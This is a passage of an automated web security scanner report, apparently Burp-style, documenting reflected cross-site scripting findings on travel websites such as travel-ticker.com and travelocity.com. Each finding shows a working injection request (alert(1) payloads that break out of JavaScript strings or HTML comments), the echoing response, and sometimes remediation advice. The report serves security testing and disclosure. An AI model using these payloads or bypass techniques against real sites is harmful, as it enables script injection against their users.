GET /images/home-text.png?a52a3"><a>eb7230ea2d8=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618518; expires=Tue, 02-Oct-2012 00:08:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13110


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home-text.png?a52a3"><a>eb7230ea2d8=1">
...[SNIP]...

4.405. http://www.travel-ticker.com/Destination/ [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /Destination/

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b668\"%3balert(1)//94fd85ec758 was submitted in the bid parameter. This input was echoed as 7b668\\";alert(1)//94fd85ec758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Destination/?tts=01&sid=S250&bid=B3114977b668\"%3balert(1)//94fd85ec758 HTTP/1.1
Host: www.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECED9449D2CCA83DC56E12B303E6219B; SaneID=ECED9449D2CCA83DC56E12B303E6219; NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c8d45525d5f4f58455e445a4a422d69

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:14 GMT
Content-Length: 316092

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker page not found</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favico
...[SNIP]...
<script>AnalyticsSupport.addAnalyticsContextListVariable("campaign","bid:B3114977b668\\";alert(1)//94fd85ec758");
AnalyticsSupport.addAnalyticsContextListVariable("campaign","sid:S250");

</script>
...[SNIP]...

4.406. http://www.travel-ticker.com/Destination/ [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /Destination/

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a90a4\"%3balert(1)//3d9d3aaa825 was submitted in the sid parameter. This input was echoed as a90a4\\";alert(1)//3d9d3aaa825 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Destination/?tts=01&sid=S250a90a4\"%3balert(1)//3d9d3aaa825&bid=B311497 HTTP/1.1
Host: www.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECED9449D2CCA83DC56E12B303E6219B; SaneID=ECED9449D2CCA83DC56E12B303E6219; NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c8d45525d5f4f58455e445a4a422d69

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:13 GMT
Content-Length: 316092

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker page not found</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favico
...[SNIP]...
<script>AnalyticsSupport.addAnalyticsContextListVariable("campaign","bid:B311497");
AnalyticsSupport.addAnalyticsContextListVariable("campaign","sid:S250a90a4\\";alert(1)//3d9d3aaa825");

</script>
...[SNIP]...

4.407. http://www.travel-ticker.com/altcategory.jsp [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /altcategory.jsp

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ada81\"%3balert(1)//21cebf7bc92 was submitted in the bid parameter. This input was echoed as ada81\\";alert(1)//21cebf7bc92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /altcategory.jsp?actionType=1&categoryType=Destination&categoryName=&sid=S250&bid=B311497ada81\"%3balert(1)//21cebf7bc92 HTTP/1.1
Host: www.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:50 GMT
Content-Length: 316092

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker page not found</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favico
...[SNIP]...
<script>AnalyticsSupport.addAnalyticsContextListVariable("campaign","bid:B311497ada81\\";alert(1)//21cebf7bc92");
AnalyticsSupport.addAnalyticsContextListVariable("campaign","sid:S250");

</script>
...[SNIP]...

4.408. http://www.travel-ticker.com/altcategory.jsp [categoryName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /altcategory.jsp

Issue detail

The value of the categoryName request parameter is copied into the HTML document as plain text between tags. The payload aa60f<img%20src%3da%20onerror%3dalert(1)>bafc79ce56a was submitted in the categoryName parameter. This input was echoed as aa60f<img src=a onerror=alert(1)>bafc79ce56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /altcategory.jsp?actionType=1&categoryType=Destination&categoryName=aa60f<img%20src%3da%20onerror%3dalert(1)>bafc79ce56a&sid=S250&bid=B311497 HTTP/1.1
Host: www.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: hotwireLogin=...[SNIP]...; Expires=Tue, 02-Oct-2012 00:38:37 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:36 GMT
Content-Length: 316277

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favicon.ico?ver=20765
...[SNIP]...
<p>aa60f<img src=a onerror=alert(1)>bafc79ce56a travel deals handpicked for you</p>
...[SNIP]...

4.409. http://www.travelocity.com/popWindow2 [dest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the dest request parameter is copied into an HTML comment. The payload 97cd3--><script>alert(1)</script>303ba927549 was submitted in the dest parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS97cd3--><script>alert(1)</script>303ba927549&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:29 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9556
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:29 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS97CD3--><SCRIPT>ALERT(1)</SCRIPT>303BA927549
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
                   
           -->
...[SNIP]...

4.410. http://www.travelocity.com/popWindow2 [fromDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the fromDate request parameter is copied into an HTML comment. The payload f4e6a--><script>alert(1)</script>36ba60a1a8 was submitted in the fromDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=ddf4e6a--><script>alert(1)</script>36ba60a1a8&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9555
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:09 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmddf4e6a--><script>alert(1)</script>36ba60a1a8
                   
           -->
...[SNIP]...

4.411. http://www.travelocity.com/popWindow2 [fromMonth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the fromMonth request parameter is copied into an HTML comment. The payload b5b8c--><script>alert(1)</script>708d11813dd was submitted in the fromMonth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mmb5b8c--><script>alert(1)</script>708d11813dd&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:02 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9556
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:10:02 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmb5b8c--><script>alert(1)</script>708d11813dddd
                   
           -->
...[SNIP]...

4.412. http://www.travelocity.com/popWindow2 [fromYear parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the fromYear request parameter is copied into an HTML comment. The payload a88ca--><script>alert(1)</script>b1769152bab was submitted in the fromYear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyya88ca--><script>alert(1)</script>b1769152bab&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9556
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:17 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyya88ca--><script>alert(1)</script>b1769152babmmdd
                   
           -->
...[SNIP]...

4.413. http://www.travelocity.com/popWindow2 [noOfAdults parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the noOfAdults request parameter is copied into an HTML comment. The payload 3d5a4--><script>alert(1)</script>d556c19d909 was submitted in the noOfAdults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=13d5a4--><script>alert(1)</script>d556c19d909&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:38 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9556
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:38 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=13d5a4--><script>alert(1)</script>d556c19d909
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
                   
           -->
...[SNIP]...

4.414. http://www.travelocity.com/popWindow2 [toDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the toDate request parameter is copied into an HTML comment. The payload d7b6d--><script>alert(1)</script>c27dd7fe78e was submitted in the toDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=ddd7b6d--><script>alert(1)</script>c27dd7fe78e&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9575
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:09:17 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
<!--
               drfad
               adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a
               travelers=1
               destination=BOS
               dateDisplayFormat=mm/dd/yyyy
               departureDate=yyyymmdd
               returnDate=yyyymmddd7b6d--><script>alert(1)</script>c27dd7fe78e    
           -->
...[SNIP]...

4.415. http://www.travelocity.com/popWindow2 [toMonth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The value of the toMonth request parameter is copied into an HTML comment. The payload 9d4b7--><script>alert(1)</script>bbc12be6325 was submitted in the toMonth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--><script>alert(1)</script>bbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
